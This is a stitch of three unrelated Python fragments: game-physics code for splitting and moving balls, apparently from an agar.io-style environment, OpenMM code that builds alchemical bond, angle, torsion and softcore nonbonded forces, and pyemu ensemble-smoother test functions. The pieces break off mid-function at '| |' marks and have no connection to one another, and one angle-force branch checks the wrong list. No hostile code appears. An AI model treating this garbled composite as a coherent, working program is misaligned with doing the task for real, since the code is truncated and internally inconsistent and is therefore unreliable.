self.split_acc_init = self.split_vel_init / self.split_vel_zero_time # Initialized deceleration scalar after split
self.age = 0 # The time of the current ball from the last split
self.vel_last = Vector2(0, 0) if vel_last is None else vel_last
self.acc_last = Vector2(0, 0) if acc_last is None else acc_last
if self.vel_last.length() > 0:
self.cooling_last = True
else:
self.cooling_last = False
if not hasattr(self, 'direction'):
self.direction = copy.deepcopy((self.vel + self.vel_last + Vector2(0.00001, 0.00001)).normalize())
self.check_border()
self.stop_flag = stop_flag
self.last_given_acc = Vector2(0, 0) if last_given_acc is None else last_given_acc
def cal_vel_max(self, radius):
return self.vel_max*20/(radius+10)
def move(self, given_acc=None, given_acc_center=None, duration=0.05):
"""
Overview:
Realize the movement of the ball, pass in the direction and time parameters
"""
self.age += duration
if given_acc is not None:
given_acc = given_acc if given_acc.length() < 1 else given_acc.normalize()
given_acc *= 10
self.last_given_acc = given_acc
else:
given_acc = self.last_given_acc
if self.stop_flag: # Stop function used
if not hasattr(self, 'stop_time'):
self.stop_time = 0
self.acc_stop = Vector2(0, 0)
if self.stop_time < self.stop_zero_time: # Deceleration state
self.vel = self.vel + self.acc_stop * duration # Acceleration is already in the opposite direction of speed
self.vel_last += self.acc_last * duration
self.stop_time += duration
if self.stop_time >= self.stop_zero_time: # If the stop time is exceeded, set the speed and acceleration to 0 directly
self.vel = Vector2(0, 0)
self.acc_stop = Vector2(0, 0)
self.vel_last = Vector2(0, 0)
self.acc_last = Vector2(0, 0)
self.position = self.position + (self.vel + self.vel_last) * duration
else: # Exceed the stop time, move closer to the center
if given_acc_center is None: # Single ball
return
else: # Multiple balls
self.acc = format_vector(given_acc*self.acc_max, self.acc_max)
acc_tmp = format_vector(self.acc + given_acc_center/math.sqrt(self.radius), self.acc_max) # The acceleration towards the center of mass is handled separately
self.vel_max_ball = self.cal_vel_max(self.radius)
self.vel = format_vector(self.vel * 0.95 + (self.acc + acc_tmp) * duration, self.vel_max_ball) # vel is multiplied by a number to prevent circling phenomenon
self.position = self.position + self.vel * duration
else: # normal status
self.acc_stop = Vector2(0, 0)
if given_acc_center is None:
given_acc_center = Vector2(0, 0)
self.acc = format_vector(given_acc*self.acc_max, self.acc_max)
acc_tmp = format_vector(self.acc + given_acc_center/math.sqrt(self.radius), self.acc_max) # The acceleration towards the center of mass is handled separately
self.vel_max_ball = self.cal_vel_max(self.radius)
self.vel = format_vector(self.vel + (self.acc + acc_tmp) * duration, self.vel_max_ball)
if self.cooling_last:
self.vel_last += self.acc_last * duration
if self.age >= self.split_vel_zero_time:
self.vel_last = Vector2(0, 0)
self.acc_last = Vector2(0, 0)
self.cooling_last = False
self.position = self.position + (self.vel + self.vel_last) * duration
if self.vel.length() > 0 or self.vel_last.length() > 0:
self.direction = (self.vel + self.vel_last).normalize()
self.check_border()
def eat(self, ball, clone_num=None):
"""
Parameters:
clone_num <int>: The total number of balls for the current player
"""
if isinstance(ball, SporeBall) or isinstance(ball, FoodBall) or isinstance(ball, CloneBall):
self.set_size(add_size(self.size, ball.size))
if self.radius > self.radius_max:
self.radius = self.radius_max
elif isinstance(ball, ThornsBall):
assert clone_num is not None
self.set_size(add_size(self.size, ball.size))
if clone_num < self.part_num_max:
split_num = min(self.part_num_max - clone_num, self.on_thorns_part_num)
return self.on_thorns(split_num=split_num)
else:
logging.debug('CloneBall can not eat {}'.format(type(ball)))
self.check_border()
return True
def on_thorns(self, split_num) -> list:
'''
Overview:
Split after encountering thorns, calculate the size, position, speed, acceleration of each ball after splitting
Parameters:
split_num <int>: Number of splits added
Returns:
Return a list that contains the newly added balls after the split, the distribution of the split balls is a circle and the center of the circle has a ball
'''
# middle ball
around_radius = min(math.sqrt(self.size / (split_num + 1)), self.on_thorns_part_radius_max)
around_size = around_radius * around_radius
middle_size = self.size - around_size * split_num
self.set_size(middle_size)
middle_position = Vector2(self.position.x, self.position.y)
around_positions = []
around_vels = []
around_accs = []
for i in range(split_num):
angle = 2*math.pi*(i+1)/split_num
unit_x = math.cos(angle)
unit_y = math.sin(angle)
vel = Vector2(self.split_vel_init*unit_x, self.split_vel_init*unit_y)
acc = - Vector2(self.split_acc_init*unit_x, self.split_acc_init*unit_y)
around_position = self.position + Vector2((self.radius+around_radius)*unit_x, (self.radius+around_radius)*unit_y)
around_vels.append(vel)
around_accs.append(acc)
around_positions.append(around_position)
balls = []
for p, v, a in zip(around_positions, around_vels, around_accs):
around_ball = CloneBall(team_name=self.team_name, name=uuid.uuid1(), position=p, border=self.border,
size=around_size, vel=copy.deepcopy(self.vel), acc=copy.deepcopy(self.acc),
vel_last=v, acc_last=a, last_given_acc=copy.deepcopy(self.last_given_acc),
stop_flag=self.stop_flag, owner=self.owner, spore_settings=self.spore_settings,
**self.cfg)
balls.append(around_ball)
return balls
def eject(self, direction=None) -> list:
'''
Overview:
When spit out spores, the spores spit out must be in the moving direction of the ball, and the position is tangent to the original ball after spitting out
Returns:
Return a list containing the spores spit out
'''
if direction is None:
direction = copy.deepcopy(self.direction)
if self.radius >= self.eject_radius_min:
spore_radius = self.spore_settings.radius_min
self.set_size(self.size - spore_radius**2)
direction_unit = direction.normalize()
position = self.position + direction_unit * (self.radius + spore_radius)
return SporeBall(name=uuid.uuid1(), position=position, border=self.border, direction=direction_unit, **self.spore_settings)
else:
return False
def split(self, clone_num, direction=None) -> list:
'''
Overview:
Active splitting, the two balls produced by splitting have the same volume, and their positions are tangent to the forward direction
Parameters:
clone_num <int>: The total number of balls for the current player
Returns:
The return value is the new ball after the split
'''
if direction is None:
direction = copy.deepcopy(self.direction)
if self.radius >= self.split_radius_min and clone_num < self.part_num_max:
split_size = self.size / 2
self.set_size(split_size)
clone_num += 1
direction_unit = direction.normalize()
position = self.position + direction_unit * (self.radius * 2)
vel_split = self.split_vel_init * direction_unit
acc_split = - self.split_acc_init * direction_unit
return CloneBall(team_name=self.team_name, name=uuid.uuid1(), position=position, border=self.border,
size=split_size, vel=copy.deepcopy(self.vel), acc=copy.deepcopy(self.acc),
vel_last=vel_split, acc_last=acc_split, last_given_acc=copy.deepcopy(self.last_given_acc),
stop_flag=self.stop_flag, owner=self.owner, spore_settings=self.spore_settings, **self.cfg)
else:
return False
def rigid_collision(self, ball):
'''
Overview:
When two balls collide, We need to determine whether the two balls belong to the same player
A. If not, do nothing until one party is eaten at the end
B. If the two balls are the same owner, judge whether the age of the two is full or not meet the fusion condition, if they are satisfied, do nothing.
C. If the two balls are the same owner, judge | |
interaction contains unique old atoms
if len(atom_interaction_set.intersection(self._atom_classes['unique_old_atoms'])) > 0:
return InteractionGroup.unique_old
#Do the same for new atoms
elif len(atom_interaction_set.intersection(self._atom_classes['unique_new_atoms'])) > 0:
return InteractionGroup.unique_new
#if the interaction set is a strict subset of the environment atoms, then it is in the environment group
#and should not be alchemically modified at all.
elif atom_interaction_set.issubset(self._atom_classes['environment_atoms']):
return InteractionGroup.environment
#having covered the cases of all-environment, unique old-containing, and unique-new-containing, anything else
#should belong to the last class--contains core atoms but not any unique atoms.
else:
return InteractionGroup.core
def _add_bond_force_terms(self):
"""
This function adds the appropriate bond forces to the system (according to groups defined above). Note that it
does _not_ add the particles to the force. It only adds the force to facilitate another method adding the
particles to the force.
"""
core_energy_expression = '(K/2)*(r-length)^2;'
core_energy_expression += 'K = (1-lambda_bonds)*K1 + lambda_bonds*K2;' # linearly interpolate spring constant
core_energy_expression += 'length = (1-lambda_bonds)*length1 + lambda_bonds*length2;' # linearly interpolate bond length
if self._has_functions:
try:
core_energy_expression += 'lambda_bonds = ' + self._functions['lambda_bonds']
except KeyError as e:
print("Functions were provided, but no term was provided for the bonds")
raise e
#create the force and add the relevant parameters
custom_core_force = openmm.CustomBondForce(core_energy_expression)
custom_core_force.addPerBondParameter('length1') # old bond length
custom_core_force.addPerBondParameter('K1') # old spring constant
custom_core_force.addPerBondParameter('length2') # new bond length
custom_core_force.addPerBondParameter('K2') #new spring constant
if self._has_functions:
custom_core_force.addGlobalParameter('lambda', 0.0)
custom_core_force.addEnergyParameterDerivative('lambda')
else:
custom_core_force.addGlobalParameter('lambda_bonds', 0.0)
self._hybrid_system.addForce(custom_core_force)
self._hybrid_system_forces['core_bond_force'] = custom_core_force
#add a bond force for environment and unique atoms (bonds are never scaled for these):
standard_bond_force = openmm.HarmonicBondForce()
self._hybrid_system.addForce(standard_bond_force)
self._hybrid_system_forces['standard_bond_force'] = standard_bond_force
def _add_angle_force_terms(self):
"""
This function adds the appropriate angle force terms to the hybrid system. It does not add particles
or parameters to the force; this is done elsewhere.
"""
energy_expression = '(K/2)*(theta-theta0)^2;'
energy_expression += 'K = (1.0-lambda_angles)*K_1 + lambda_angles*K_2;' # linearly interpolate spring constant
energy_expression += 'theta0 = (1.0-lambda_angles)*theta0_1 + lambda_angles*theta0_2;' # linearly interpolate equilibrium angle
if self._has_functions:
try:
energy_expression += 'lambda_angles = ' + self._functions['lambda_angles']
except KeyError as e:
print("Functions were provided, but no term was provided for the angles")
raise e
#create the force and add relevant parameters
custom_core_force = openmm.CustomAngleForce(energy_expression)
custom_core_force.addPerAngleParameter('theta0_1') # molecule1 equilibrium angle
custom_core_force.addPerAngleParameter('K_1') # molecule1 spring constant
custom_core_force.addPerAngleParameter('theta0_2') # molecule2 equilibrium angle
custom_core_force.addPerAngleParameter('K_2') # molecule2 spring constant
#create the force for neglected angles and relevant parameters; the K_1 term will be set to 0
if len(self.neglected_new_angle_terms) > 0: #if there is at least one neglected angle term from the geometry engine
_logger.info("\t_add_angle_force_terms: there are > 0 neglected new angles: adding CustomAngleForce")
custom_neglected_new_force = openmm.CustomAngleForce(energy_expression)
custom_neglected_new_force.addPerAngleParameter('theta0_1') # molecule1 equilibrium angle
custom_neglected_new_force.addPerAngleParameter('K_1') # molecule1 spring constant
custom_neglected_new_force.addPerAngleParameter('theta0_2') # molecule2 equilibrium angle
custom_neglected_new_force.addPerAngleParameter('K_2') # molecule2 spring constant
if len(self.neglected_old_angle_terms) > 0: #if there is at least one neglected angle term from the geometry engine
_logger.info("\t_add_angle_force_terms: there are > 0 neglected old angles: adding CustomAngleForce")
custom_neglected_old_force = openmm.CustomAngleForce(energy_expression)
custom_neglected_old_force.addPerAngleParameter('theta0_1') # molecule1 equilibrium angle
custom_neglected_old_force.addPerAngleParameter('K_1') # molecule1 spring constant
custom_neglected_old_force.addPerAngleParameter('theta0_2') # molecule2 equilibrium angle
custom_neglected_old_force.addPerAngleParameter('K_2') # molecule2 spring constant
if self._has_functions:
custom_core_force.addGlobalParameter('lambda', 0.0)
custom_core_force.addEnergyParameterDerivative('lambda')
if len(self.neglected_new_angle_terms) > 0:
custom_neglected_new_force.addGlobalParameter('lambda', 0.0)
custom_neglected_new_force.addEnergyParameterDerivative('lambda')
if len(self.neglected_old_angle_terms) > 0:
custom_neglected_old_force.addGlobalParameter('lambda', 0.0)
custom_neglected_old_force.addEnergyParameterDerivative('lambda')
else:
custom_core_force.addGlobalParameter('lambda_angles', 0.0)
if len(self.neglected_new_angle_terms) > 0:
custom_neglected_new_force.addGlobalParameter('lambda_angles', 0.0)
if len(self.neglected_new_angle_terms) > 0:
custom_neglected_old_force.addGlobalParameter('lambda_angles', 0.0)
#add the force to the system and the force dict.
self._hybrid_system.addForce(custom_core_force)
self._hybrid_system_forces['core_angle_force'] = custom_core_force
if len(self.neglected_new_angle_terms) > 0:
self._hybrid_system.addForce(custom_neglected_new_force)
self._hybrid_system_forces['custom_neglected_new_angle_force'] = custom_neglected_new_force
if len(self.neglected_old_angle_terms) > 0:
self._hybrid_system.addForce(custom_neglected_old_force)
self._hybrid_system_forces['custom_neglected_old_angle_force'] = custom_neglected_old_force
#add an angle term for environment/unique interactions--these are never scaled
standard_angle_force = openmm.HarmonicAngleForce()
self._hybrid_system.addForce(standard_angle_force)
self._hybrid_system_forces['standard_angle_force'] = standard_angle_force
def _add_torsion_force_terms(self):
"""
This function adds the appropriate PeriodicTorsionForce terms to the system. Core torsions are interpolated,
while environment and unique torsions are always on.
"""
energy_expression = '(1-lambda_torsions)*U1 + lambda_torsions*U2;'
energy_expression += 'U1 = K1*(1+cos(periodicity1*theta-phase1));'
energy_expression += 'U2 = K2*(1+cos(periodicity2*theta-phase2));'
if self._has_functions:
try:
energy_expression += 'lambda_torsions = ' + self._functions['lambda_torsions']
except KeyError as e:
print("Functions were provided, but no term was provided for torsions")
raise e
#create the force and add the relevant parameters
custom_core_force = openmm.CustomTorsionForce(energy_expression)
custom_core_force.addPerTorsionParameter('periodicity1') # molecule1 periodicity
custom_core_force.addPerTorsionParameter('phase1') # molecule1 phase
custom_core_force.addPerTorsionParameter('K1') # molecule1 spring constant
custom_core_force.addPerTorsionParameter('periodicity2') # molecule2 periodicity
custom_core_force.addPerTorsionParameter('phase2') # molecule2 phase
custom_core_force.addPerTorsionParameter('K2') # molecule2 spring constant
if self._has_functions:
custom_core_force.addGlobalParameter('lambda', 0.0)
custom_core_force.addEnergyParameterDerivative('lambda')
else:
custom_core_force.addGlobalParameter('lambda_torsions', 0.0)
#add the force to the system
self._hybrid_system.addForce(custom_core_force)
self._hybrid_system_forces['core_torsion_force'] = custom_core_force
#create and add the torsion term for unique/environment atoms
standard_torsion_force = openmm.PeriodicTorsionForce()
self._hybrid_system.addForce(standard_torsion_force)
self._hybrid_system_forces['standard_torsion_force'] = standard_torsion_force
def _add_nonbonded_force_terms(self):
"""
Add the nonbonded force terms to the hybrid system. Note that as with the other forces,
this method does not add any interactions. It only sets up the forces.
Parameters
----------
nonbonded_method : int
One of the openmm.NonbondedForce nonbonded methods.
"""
#Add a regular nonbonded force for all interactions that are not changing.
standard_nonbonded_force = openmm.NonbondedForce()
self._hybrid_system.addForce(standard_nonbonded_force)
_logger.info(f"\t_add_nonbonded_force_terms: {standard_nonbonded_force} added to hybrid system")
self._hybrid_system_forces['standard_nonbonded_force'] = standard_nonbonded_force
# Create a CustomNonbondedForce to handle alchemically interpolated nonbonded parameters.
# Select functional form based on nonbonded method.
# TODO: check _nonbonded_custom_ewald and _nonbonded_custom_cutoff since they take arguments that are never used...
if self._nonbonded_method in [openmm.NonbondedForce.NoCutoff]:
_logger.info("\t_add_nonbonded_force_terms: nonbonded_method is NoCutoff")
sterics_energy_expression = self._nonbonded_custom(self._softcore_LJ_v2)
elif self._nonbonded_method in [openmm.NonbondedForce.CutoffPeriodic, openmm.NonbondedForce.CutoffNonPeriodic]:
_logger.info("\t_add_nonbonded_force_terms: nonbonded_method is Cutoff(Periodic or NonPeriodic)")
epsilon_solvent = self._old_system_forces['NonbondedForce'].getReactionFieldDielectric()
r_cutoff = self._old_system_forces['NonbondedForce'].getCutoffDistance()
sterics_energy_expression = self._nonbonded_custom(self._softcore_LJ_v2)
standard_nonbonded_force.setReactionFieldDielectric(epsilon_solvent)
standard_nonbonded_force.setCutoffDistance(r_cutoff)
elif self._nonbonded_method in [openmm.NonbondedForce.PME, openmm.NonbondedForce.Ewald]:
_logger.info("\t_add_nonbonded_force_terms: nonbonded_method is PME or Ewald")
[alpha_ewald, nx, ny, nz] = self._old_system_forces['NonbondedForce'].getPMEParameters()
delta = self._old_system_forces['NonbondedForce'].getEwaldErrorTolerance()
r_cutoff = self._old_system_forces['NonbondedForce'].getCutoffDistance()
sterics_energy_expression = self._nonbonded_custom(self._softcore_LJ_v2)
standard_nonbonded_force.setPMEParameters(alpha_ewald, nx, ny, nz)
standard_nonbonded_force.setEwaldErrorTolerance(delta)
standard_nonbonded_force.setCutoffDistance(r_cutoff)
else:
raise Exception("Nonbonded method %s not supported yet." % str(self._nonbonded_method))
standard_nonbonded_force.setNonbondedMethod(self._nonbonded_method)
_logger.info(f"\t_add_nonbonded_force_terms: {self._nonbonded_method} added to standard nonbonded force")
sterics_energy_expression += self._nonbonded_custom_sterics_common()
sterics_mixing_rules = self._nonbonded_custom_mixing_rules()
custom_nonbonded_method = self._translate_nonbonded_method_to_custom(self._nonbonded_method)
total_sterics_energy = "U_sterics;" + sterics_energy_expression + sterics_mixing_rules
if self._has_functions:
try:
total_sterics_energy += 'lambda_sterics = ' + self._functions['lambda_sterics']
except KeyError as e:
print("Functions were provided, but there is no entry for sterics")
raise e
sterics_custom_nonbonded_force = openmm.CustomNonbondedForce(total_sterics_energy)
if self._softcore_LJ_v2:
sterics_custom_nonbonded_force.addGlobalParameter("softcore_alpha", self._softcore_LJ_v2_alpha)
else:
sterics_custom_nonbonded_force.addGlobalParameter("softcore_alpha", self.softcore_alpha)
sterics_custom_nonbonded_force.addPerParticleParameter("sigmaA") # Lennard-Jones sigma initial
sterics_custom_nonbonded_force.addPerParticleParameter("epsilonA") # Lennard-Jones epsilon initial
sterics_custom_nonbonded_force.addPerParticleParameter("sigmaB") # Lennard-Jones sigma final
sterics_custom_nonbonded_force.addPerParticleParameter("epsilonB") # Lennard-Jones epsilon final
sterics_custom_nonbonded_force.addPerParticleParameter("unique_old") # 1 = hybrid old atom, 0 otherwise
sterics_custom_nonbonded_force.addPerParticleParameter("unique_new") # 1 = hybrid new atom, 0 otherwise
if self._has_functions:
sterics_custom_nonbonded_force.addGlobalParameter('lambda', 0.0)
sterics_custom_nonbonded_force.addEnergyParameterDerivative('lambda')
else:
sterics_custom_nonbonded_force.addGlobalParameter("lambda_sterics_core", 0.0)
sterics_custom_nonbonded_force.addGlobalParameter("lambda_electrostatics_core", 0.0)
sterics_custom_nonbonded_force.addGlobalParameter("lambda_sterics_insert", 0.0)
sterics_custom_nonbonded_force.addGlobalParameter("lambda_sterics_delete", 0.0)
sterics_custom_nonbonded_force.setNonbondedMethod(custom_nonbonded_method)
_logger.info(f"\t_add_nonbonded_force_terms: {custom_nonbonded_method} added to sterics_custom_nonbonded force")
self._hybrid_system.addForce(sterics_custom_nonbonded_force)
self._hybrid_system_forces['core_sterics_force'] = sterics_custom_nonbonded_force
_logger.info(f"\t_add_nonbonded_force_terms: {sterics_custom_nonbonded_force} added to hybrid system")
#set the use of dispersion correction to be the same between the new nonbonded force and the old one:
#these will be ignored from the _logger for the time being
if self._old_system_forces['NonbondedForce'].getUseDispersionCorrection():
self._hybrid_system_forces['standard_nonbonded_force'].setUseDispersionCorrection(True)
if self._use_dispersion_correction:
sterics_custom_nonbonded_force.setUseLongRangeCorrection(True)
else:
self._hybrid_system_forces['standard_nonbonded_force'].setUseDispersionCorrection(False)
if self._old_system_forces['NonbondedForce'].getUseSwitchingFunction():
switching_distance = self._old_system_forces['NonbondedForce'].getSwitchingDistance()
standard_nonbonded_force.setUseSwitchingFunction(True)
standard_nonbonded_force.setSwitchingDistance(switching_distance)
sterics_custom_nonbonded_force.setUseSwitchingFunction(True)
sterics_custom_nonbonded_force.setSwitchingDistance(switching_distance)
else:
standard_nonbonded_force.setUseSwitchingFunction(False)
sterics_custom_nonbonded_force.setUseSwitchingFunction(False)
def _nonbonded_custom_sterics_common(self):
"""
Get a custom sterics expression using amber softcore expression
Returns
-------
sterics_addition : str
The common softcore sterics energy expression
"""
sterics_addition = "epsilon = (1-lambda_sterics)*epsilonA + lambda_sterics*epsilonB;" #interpolation
sterics_addition += "reff_sterics = sigma*((softcore_alpha*lambda_alpha + (r/sigma)^6))^(1/6);" # effective softcore distance for sterics
sterics_addition += "sigma = (1-lambda_sterics)*sigmaA + lambda_sterics*sigmaB;"
sterics_addition += "lambda_alpha = new_interaction*(1-lambda_sterics_insert) + old_interaction*lambda_sterics_delete;"
sterics_addition += "lambda_sterics = core_interaction*lambda_sterics_core + new_interaction*lambda_sterics_insert + old_interaction*lambda_sterics_delete;"
sterics_addition += "core_interaction = delta(unique_old1+unique_old2+unique_new1+unique_new2);new_interaction = max(unique_new1, unique_new2);old_interaction = max(unique_old1, unique_old2);"
return sterics_addition
def _nonbonded_custom(self, v2):
"""
Get a part of the nonbonded energy expression when there is no cutoff.
Returns
-------
sterics_energy_expression : str
The energy expression for U_sterics
electrostatics_energy_expression : str
The energy expression for electrostatics
"""
# soft-core Lennard-Jones
if v2:
sterics_energy_expression = "U_sterics = select(step(r - r_LJ), 4*epsilon*x*(x-1.0), U_sterics_quad);"
sterics_energy_expression += f"U_sterics_quad = Force*(((r - r_LJ)^2)/2 - (r - r_LJ)) + U_sterics_cut;"
sterics_energy_expression += f"U_sterics_cut = 4*epsilon*((sigma/r_LJ)^6)*(((sigma/r_LJ)^6) - 1.0);"
sterics_energy_expression += f"Force = -4*epsilon*((-12*sigma^12)/(r_LJ^13) + (6*sigma^6)/(r_LJ^7));"
sterics_energy_expression += f"x = (sigma/r)^6;"
sterics_energy_expression += f"r_LJ = softcore_alpha*((26/7)*(sigma^6)*lambda_sterics_deprecated)^(1/6);"
sterics_energy_expression += f"lambda_sterics_deprecated = new_interaction*(1.0 - lambda_sterics_insert) + old_interaction*lambda_sterics_delete;"
else:
sterics_energy_expression = "U_sterics = 4*epsilon*x*(x-1.0); x = (sigma/reff_sterics)^6;"
return sterics_energy_expression
def _nonbonded_custom_mixing_rules(self):
"""
Mixing rules for the custom nonbonded force.
Returns
-------
sterics_mixing_rules : str
The mixing expression for sterics
electrostatics_mixing_rules : str
The mixiing rules for electrostatics
"""
# Define mixing rules.
sterics_mixing_rules = "epsilonA = sqrt(epsilonA1*epsilonA2);" # mixing rule for | |
[os.remove(csv_file) for csv_file in csv_files]
pst = pyemu.Pst("10par_xsec.pst")
par = pst.parameter_data
par.loc["stage", "partrans"] = "fixed"
v = pyemu.utils.ExpVario(contribution=0.25, a=60.0)
gs = pyemu.utils.GeoStruct(variograms=[v], transform="log")
par = pst.parameter_data
k_names = par.loc[par.parnme.apply(lambda x: x.startswith('k')), "parnme"]
sr = flopy.utils.SpatialReference(delc=[10], delr=np.zeros((10)) + 10.0)
cov = gs.covariance_matrix(sr.xcentergrid[0, :], sr.ycentergrid[0, :], k_names)
obs = pst.observation_data
obs.loc["h01_09", "weight"] = 100.0
obs.loc["h01_09", 'obgnme'] = "lt_test"
obs.loc["h01_09", 'obsval'] = 2.0
es = pyemu.EnsembleSmoother(pst, parcov=cov,
num_slaves=10, port=4005, verbose=True,
drop_bad_reals=14000.)
lz = es.get_localizer().to_dataframe()
# the k pars upgrad of h01_04 and h01_06 are localized
upgrad_pars = [pname for pname in lz.columns if "_" in pname and \
int(pname.split('_')[1]) > 4]
lz.loc["h01_04", upgrad_pars] = 0.0
upgrad_pars = [pname for pname in lz.columns if '_' in pname and \
int(pname.split('_')[1]) > 6]
lz.loc["h01_06", upgrad_pars] = 0.0
lz = pyemu.Matrix.from_dataframe(lz).T
es.initialize(parensemble="10par_xsec.pe.bak",obsensemble="10par_xsec.oe.bak",
restart_obsensemble="10par_xsec.oe.restart.bak",init_lambda=10000.0)
# just for force full upgrade testing for
es.iter_num = 2
es.update(lambda_mults=[.1, 1000.0],calc_only=True,use_approx=False,localizer=lz)
#obj = pd.read_csv("10par_xsec.pst.iobj.csv")
#obj_act = pd.read_csv("10par_xsec.pst.iobj.actual.csv")
upgrade = pd.read_csv("10par_xsec.pst.upgrade_1.0003.csv")
os.chdir(os.path.join("..", ".."))
# for b,n in zip([bak_obj,bak_obj_act,bak_upgrade],[obj,obj_act,upgrade]):
# print(b,n)
# d = b - n
# print(d.max(),d.min())
d = (bak_upgrade - upgrade).apply(np.abs)
assert d.max().max() < 1.0e-6
def tenpar_fixed():
import os
import numpy as np
import flopy
import pyemu
os.chdir(os.path.join("smoother","10par_xsec"))
csv_files = [f for f in os.listdir('.') if f.endswith(".csv")]
[os.remove(csv_file) for csv_file in csv_files]
pst = pyemu.Pst("10par_xsec.pst")
par = pst.parameter_data
par.loc["stage","partrans"] = "fixed"
v = pyemu.utils.ExpVario(contribution=0.25,a=60.0)
gs = pyemu.utils.GeoStruct(variograms=[v],transform="log")
par = pst.parameter_data
k_names = par.loc[par.parnme.apply(lambda x: x.startswith('k')),"parnme"]
sr = flopy.utils.SpatialReference(delc=[10],delr=np.zeros((10))+10.0)
cov = gs.covariance_matrix(sr.xcentergrid[0,:],sr.ycentergrid[0,:],k_names)
es = pyemu.EnsembleSmoother(pst,parcov=cov,
num_slaves=10,port=4005,verbose=True,
drop_bad_reals=14000.)
lz = es.get_localizer().to_dataframe()
#the k pars upgrad of h01_04 and h01_06 are localized
upgrad_pars = [pname for pname in lz.columns if "_" in pname and\
int(pname.split('_')[1]) > 4]
lz.loc["h01_04",upgrad_pars] = 0.0
upgrad_pars = [pname for pname in lz.columns if '_' in pname and \
int(pname.split('_')[1]) > 6]
lz.loc["h01_06", upgrad_pars] = 0.0
lz = pyemu.Matrix.from_dataframe(lz).T
print(lz)
es.initialize(num_reals=100,init_lambda=10000.0)
for it in range(1):
#es.update(lambda_mults=[0.1,1.0,10.0],localizer=lz,run_subset=20)
#es.update(lambda_mults=[0.1,1.0,10.0],run_subset=30)
es.update(lambda_mults=[.1,1000.0])
os.chdir(os.path.join("..",".."))
def tenpar():
import os
import numpy as np
import flopy
import pyemu
os.chdir(os.path.join("smoother","10par_xsec"))
csv_files = [f for f in os.listdir('.') if f.endswith(".csv")]
[os.remove(csv_file) for csv_file in csv_files]
pst = pyemu.Pst("10par_xsec.pst")
dia_parcov = pyemu.Cov.from_parameter_data(pst,sigma_range=6.0)
v = pyemu.utils.ExpVario(contribution=0.25,a=60.0)
gs = pyemu.utils.GeoStruct(variograms=[v],transform="log")
par = pst.parameter_data
k_names = par.loc[par.parnme.apply(lambda x: x.startswith('k')),"parnme"]
sr = flopy.utils.SpatialReference(delc=[10],delr=np.zeros((10))+10.0)
full_cov = gs.covariance_matrix(sr.xcentergrid[0,:],sr.ycentergrid[0,:],k_names)
dia_parcov.drop(list(k_names),axis=1)
cov = dia_parcov.extend(full_cov)
es = pyemu.EnsembleSmoother("10par_xsec.pst",parcov=cov,
num_slaves=10,port=4005,verbose=True,
drop_bad_reals=14000.)
lz = es.get_localizer().to_dataframe()
#the k pars upgrad of h01_04 and h01_06 are localized
upgrad_pars = [pname for pname in lz.columns if "_" in pname and\
int(pname.split('_')[1]) > 4]
lz.loc["h01_04",upgrad_pars] = 0.0
upgrad_pars = [pname for pname in lz.columns if '_' in pname and \
int(pname.split('_')[1]) > 6]
lz.loc["h01_06", upgrad_pars] = 0.0
lz = pyemu.Matrix.from_dataframe(lz).T
print(lz)
es.initialize(num_reals=100,init_lambda=10000.0)
for it in range(1):
#es.update(lambda_mults=[0.1,1.0,10.0],localizer=lz,run_subset=20)
#es.update(lambda_mults=[0.1,1.0,10.0],run_subset=30)
es.update(lambda_mults=[.1,1000.0])
os.chdir(os.path.join("..",".."))
def tenpar_opt():
import os
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import flopy
import pyemu
os.chdir(os.path.join("smoother","10par_xsec"))
csv_files = [f for f in os.listdir('.') if f.endswith(".csv")]
[os.remove(csv_file) for csv_file in csv_files]
pst = pyemu.Pst("10par_xsec.pst")
dia_parcov = pyemu.Cov.from_parameter_data(pst,sigma_range=6.0)
v = pyemu.utils.ExpVario(contribution=0.25,a=60.0)
gs = pyemu.utils.GeoStruct(variograms=[v],transform="log")
par = pst.parameter_data
k_names = par.loc[par.parnme.apply(lambda x: x.startswith('k')),"parnme"]
sr = flopy.utils.SpatialReference(delc=[10],delr=np.zeros((10))+10.0)
full_cov = gs.covariance_matrix(sr.xcentergrid[0,:],sr.ycentergrid[0,:],k_names)
dia_parcov.drop(list(k_names),axis=1)
cov = dia_parcov.extend(full_cov)
obs = pst.observation_data
# obs.loc["h01_02","weight"] = 10.0
# obs.loc["h01_02","obgnme"] = "lt_test"
# obs.loc["h01_02", "obsval"] = 1.0
obs.loc["h01_09","weight"] = 100.0
obs.loc["h01_09",'obgnme'] = "lt_test"
obs.loc["h01_09", 'obsval'] = 2.0
print(obs)
#return()
pst.write("10par_xsec_opt.pst")
pst.write(os.path.join("template","10par_xsec_opt.pst"))
es = pyemu.EnsembleSmoother("10par_xsec_opt.pst",parcov=cov,
num_slaves=10,port=4005,verbose=True)
lz = es.get_localizer().to_dataframe()
#the k pars upgrad of h01_04 and h01_06 are localized
upgrad_pars = [pname for pname in lz.columns if "_" in pname and\
int(pname.split('_')[1]) > 4]
lz.loc["h01_04",upgrad_pars] = 0.0
upgrad_pars = [pname for pname in lz.columns if '_' in pname and \
int(pname.split('_')[1]) > 6]
lz.loc["h01_06", upgrad_pars] = 0.0
lz = pyemu.Matrix.from_dataframe(lz).T
print(lz)
mc = pyemu.MonteCarlo(pst=pst,parcov=cov)
mc.draw(300,obs=True)
es.initialize(parensemble=mc.parensemble,obsensemble=mc.obsensemble,init_lambda=10000.0)
niter=20
for it in range(niter):
#es.update(lambda_mults=[0.1,1.0,10.0],localizer=lz,run_subset=20)
#es.update(lambda_mults=[0.1,1.0,10.0],run_subset=30)
es.update(lambda_mults=[.1,1.0,10.0],run_subset=30)
oe_ieq = pd.read_csv("10par_xsec_opt.pst.obsensemble.{0:04d}.csv".format(niter))
#obs.loc["h01_09","weight"] = 0.0
es = pyemu.EnsembleSmoother("10par_xsec.pst", parcov=cov,
num_slaves=10, port=4005, verbose=True)
lz = es.get_localizer().to_dataframe()
# the k pars upgrad of h01_04 and h01_06 are localized
upgrad_pars = [pname for pname in lz.columns if "_" in pname and \
int(pname.split('_')[1]) > 4]
lz.loc["h01_04", upgrad_pars] = 0.0
upgrad_pars = [pname for pname in lz.columns if '_' in pname and \
int(pname.split('_')[1]) > 6]
lz.loc["h01_06", upgrad_pars] = 0.0
lz = pyemu.Matrix.from_dataframe(lz).T
print(lz)
es.initialize(parensemble=mc.parensemble,obsensemble=mc.obsensemble, init_lambda=10000.0)
for it in range(niter):
# es.update(lambda_mults=[0.1,1.0,10.0],localizer=lz,run_subset=20)
# es.update(lambda_mults=[0.1,1.0,10.0],run_subset=30)
es.update(lambda_mults=[.1, 1.0,10.0], run_subset=30)
